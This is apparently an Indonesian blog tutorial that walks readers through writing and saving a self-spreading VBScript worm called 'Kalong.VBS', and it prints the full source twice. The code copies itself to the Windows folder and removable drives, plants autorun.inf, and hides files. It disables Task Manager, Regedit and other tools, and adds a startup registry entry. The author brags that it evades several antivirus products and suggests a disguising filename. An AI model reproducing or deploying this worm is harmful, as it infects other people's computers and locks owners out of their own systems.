Iseng-iseng mencolok Flash Disc saudara saya tiba-tiba saya nemu sebuah malcode lokal yang dibuat dengan bahasa VBS. Wah, ternyata para virus maker mulai melirik memakai bahasa VBS. Mungkin karena menyangkut HAKI (Hak Atas Kekayaan Intelektual) karena VB6.0 yang banyak beredar adalah bajakan. Jadi ia membuat virus dengan VBS yang bisa dibuat hanya dengan Notepad karena di Windows sudah ada compiler yang terintegrasi dengannya, Windows Based Script Host. Sesua janji saya, kita akan membuat virus yang sederhana menggunakan Notepad. Virus ini akan membuat dirinya menyebar ke removable disc dengan AutoRun sehingga komputer lain yang tercolok flash disc terinfeksi akan langsung menjadi korban tanpa menungu User menjalankan infector-nya. Virus ini saya beri nama “Kalong.VBS”. Sekarang buka Notepad-nya. Copy kode berikut :
‘//–Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus–//
1.
on error resume next
2.
3.
‘//–Dim kata-kata berikut ini–//
4.
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd
5.
6.
‘//–Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information–//
7.
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6.dll.vbs”
8.
set fs = createobject(”Scripting.FileSystemObject”)
9.
set mf = fs.getfile(Wscript.ScriptFullname)
10.
dim text,size
11.
size = mf.size
12.
check = mf.drive.drivetype
13.
set text = mf.openastextstream(1,-2)
14.
do while not text.atendofstream
15.
rekur = rekur & text.readline
16.
rekur = rekur & vbcrlf
17.
loop
18.
do
19.
20.
‘//–Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
21.
Set windowpath = fs.getspecialfolder(0)
22.
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
23.
tf.attributes = 32
24.
set tf=fs.createtextfile(windowpath & “\batch- k4l0n6.dll.vbs”,2,true)
25.
tf.write rekursif
26.
tf.close
27.
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
28.
tf.attributes = 39
29.
‘//–Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok–//
30.
‘Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket
31.
32.
for each flashdrive in fs.drives
33.
‘//–Cek Drive–//
34.
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then
35.
36.
‘//–Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\–//
37.
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
38.
tf.attributes =32
39.
set tf=fs.createtextfile(flashdrive.path &”\k4l0n6.dll.vbs “,2,true)
40.
tf.write rekursif
41.
tf.close
42.
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
43.
tf.attributes = 39
44.
45.
‘//–Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)–//
46.
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
47.
tf.attributes = 32
48.
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
49.
tf.write isi
50.
tf.close
51.
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
52.
tf.attributes=39
53.
end if
54.
next
55.
56.
‘//–Manipulasi Registry–//
57.
58.
set kalong = createobject(”WScript.Shell”)
59.
60.
‘//–Manip – Ubah Title Internet Explorer menjadi THE KALONG v.s. ZAY–//
61.
kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” THE KALONG v.s. ZAY “
62.
63.
‘//–Manip – Set agar file hidden tidak ditampilkan di Explorer–//
64.
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “0″, “REG_DWORD”
65.
66.
‘//–Manip – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager–//
67.
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
68.
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
69.
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
70.
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
71.
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”
72.
73.
‘//–Manip – Disable klik kanan–//
74.
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”
75.
76.
‘//–Manip – Munculkan Pesan Setiap Windows Startup–//
77.
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Worm Kalong. Variant from Rangga-Zay, don’t panic all data are safe.”
78.
79.
‘//–Manip – Aktif setiap Windows Startup–//
80.
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs “
81.
82.
‘//–Manip – Ubah RegisteredOwner dan Organization–//
83.
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “The Batrix”
84.
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”Kalong”
85.
86.
‘//–Nah kalau kode dibawah ini saya nggak tau, tolong Mas Aat_S untuk menjelaskan–//
87.
if check <> 1 then
88.
Wscript.sleep 200000
89.
end if
90.
loop while check <> 1
91.
set sd = createobject(”Wscript.shell”)
92.
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
93.
‘Akhir dari Kode
Save code di Notepad dengan cara FILE > SAVE. Lalu di save as type pilih “All Files (*.*). Simpan dengan nama : k4l0n6.dll.vbs. Sebenarnya gak usah pake *.dll juga gak apa-apa tapi usaha agar tidak mencurigakan aja.
He..he…Virus Worm ini memang bukan murni dari pemikiran saya sendiri karena meniru kode-nya virus Rangga-Zay. Tapi yang ini lebih bagus karena tidak terdeteksi pakai PCMAV RC15, CLAMAV, dan AVAST. Itung-itung ini buat Anda tahu kalau membuat virus/worm tidak perlu membeli software bajakan. Pakai Notepad (dari Windows Original) juga bisa.
sumber : pusat hacking se-dunia
‘//–Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus–//
1.
on error resume next
2.
3.
‘//–Dim kata-kata berikut ini–//
4.
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd
5.
6.
‘//–Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information–//
7.
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6.dll.vbs”
8.
set fs = createobject(”Scripting.FileSystemObject”)
9.
set mf = fs.getfile(Wscript.ScriptFullname)
10.
dim text,size
11.
size = mf.size
12.
check = mf.drive.drivetype
13.
set text = mf.openastextstream(1,-2)
14.
do while not text.atendofstream
15.
rekur = rekur & text.readline
16.
rekur = rekur & vbcrlf
17.
loop
18.
do
19.
20.
‘//–Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
21.
Set windowpath = fs.getspecialfolder(0)
22.
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
23.
tf.attributes = 32
24.
set tf=fs.createtextfile(windowpath & “\batch- k4l0n6.dll.vbs”,2,true)
25.
tf.write rekursif
26.
tf.close
27.
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
28.
tf.attributes = 39
29.
‘//–Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok–//
30.
‘Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket
31.
32.
for each flashdrive in fs.drives
33.
‘//–Cek Drive–//
34.
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then
35.
36.
‘//–Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\–//
37.
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
38.
tf.attributes =32
39.
set tf=fs.createtextfile(flashdrive.path &”\k4l0n6.dll.vbs “,2,true)
40.
tf.write rekursif
41.
tf.close
42.
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
43.
tf.attributes = 39
44.
45.
‘//–Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)–//
46.
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
47.
tf.attributes = 32
48.
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
49.
tf.write isi
50.
tf.close
51.
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
52.
tf.attributes=39
53.
end if
54.
next
55.
56.
‘//–Manipulasi Registry–//
57.
58.
set kalong = createobject(”WScript.Shell”)
59.
60.
‘//–Manip – Ubah Title Internet Explorer menjadi THE KALONG v.s. ZAY–//
61.
kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” THE KALONG v.s. ZAY “
62.
63.
‘//–Manip – Set agar file hidden tidak ditampilkan di Explorer–//
64.
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “0″, “REG_DWORD”
65.
66.
‘//–Manip – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager–//
67.
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
68.
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
69.
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
70.
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
71.
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”
72.
73.
‘//–Manip – Disable klik kanan–//
74.
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”
75.
76.
‘//–Manip – Munculkan Pesan Setiap Windows Startup–//
77.
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Worm Kalong. Variant from Rangga-Zay, don’t panic all data are safe.”
78.
79.
‘//–Manip – Aktif setiap Windows Startup–//
80.
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs “
81.
82.
‘//–Manip – Ubah RegisteredOwner dan Organization–//
83.
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “The Batrix”
84.
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”Kalong”
85.
86.
‘//–Nah kalau kode dibawah ini saya nggak tau, tolong Mas Aat_S untuk menjelaskan–//
87.
if check <> 1 then
88.
Wscript.sleep 200000
89.
end if
90.
loop while check <> 1
91.
set sd = createobject(”Wscript.shell”)
92.
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
93.
‘Akhir dari Kode
Save code di Notepad dengan cara FILE > SAVE. Lalu di save as type pilih “All Files (*.*). Simpan dengan nama : k4l0n6.dll.vbs. Sebenarnya gak usah pake *.dll juga gak apa-apa tapi usaha agar tidak mencurigakan aja.
He..he…Virus Worm ini memang bukan murni dari pemikiran saya sendiri karena meniru kode-nya virus Rangga-Zay. Tapi yang ini lebih bagus karena tidak terdeteksi pakai PCMAV RC15, CLAMAV, dan AVAST. Itung-itung ini buat Anda tahu kalau membuat virus/worm tidak perlu membeli software bajakan. Pakai Notepad (dari Windows Original) juga bisa.
sumber : pusat hacking se-dunia
{ 0 comments... read them below or add one }
Posting Komentar